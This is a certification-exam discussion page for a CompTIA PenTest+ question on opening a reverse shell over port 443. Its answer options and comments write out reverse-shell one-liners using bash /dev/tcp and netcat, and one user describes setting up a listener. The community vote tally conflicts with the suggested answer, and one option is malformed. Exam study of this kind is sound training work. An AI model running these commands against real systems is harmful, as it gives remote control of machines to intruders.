ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam PT0-001 All Questions

View all questions & answers for the PT0-001 exam
Go to Exam

Exam PT0-001 topic 1 question 39 discussion

Actual exam question from CompTIA's PT0-001
Question #: 39
Topic #: 1
[All PT0-001 Questions]

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

  • A. perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;
  • B. ssh superadmin@<DESTINATIONIP> -p 443
  • C. nc -e /bin/sh <SOURCEIP> 443
  • D. bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1
Show Suggested Answer Hide Answer
Suggested Answer: D 🗳️
Reference:
https://hackernoon.com/reverse-shell-cf154dfee6bd
by D1960 at Feb. 23, 2020, 10:07 p.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
mr_robot
Highly Voted 5 years, 3 months ago
PenTest+ Practice Tests Book - SYBEX D. - A reverse shell opens a communication channel on a port and waits for incoming connections. The client’s machine acts as a server and initiates a connection to the tester’s machine. This is what is done by using the following: bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1 Given the options, D is the best option. A and C will not work because they are using the <SOURCEIP> and not the <DESTINATIONIP>. Option B is not correct because it is using the improper syntax.
upvoted 14 times
TheThreatGuy
4 years, 6 months ago
Agree with the above. Can confirm with the reverse shell cheat sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
upvoted 4 times
...
...
kloug
Most Recent 2 years, 5 months ago
ddddddddd
upvoted 1 times
...
miabe
3 years ago
Selected Answer: D
looks good to me
upvoted 1 times
...
Setsunarcangel
3 years, 3 months ago
Bash Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
upvoted 1 times
...
jon34thna
5 years, 4 months ago
I like D. It sends a shell to the attacker. So I setup a listner on the Kali (nc -lvp 4444) then use the command # bash -i>& /dev/tcp/attackIP/4444 0>&1 It worked for me. So I'm sticking with D Dont think it's C because needs to send shell from victim machine and 'nc' may not be installed on victim.
upvoted 4 times
...
D1960
5 years, 4 months ago
Answer C seems more likely: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/
upvoted 1 times
TheThreatGuy
4 years, 6 months ago
C has source IP, not destination IP. This is setting up a reverse shell with itself. D is correct.
upvoted 2 times
...
...
D1960
5 years, 4 months ago
Answer C seems more likely: https://hackernoon.com/reverse-shell-cf154dfee6bd
upvoted 2 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel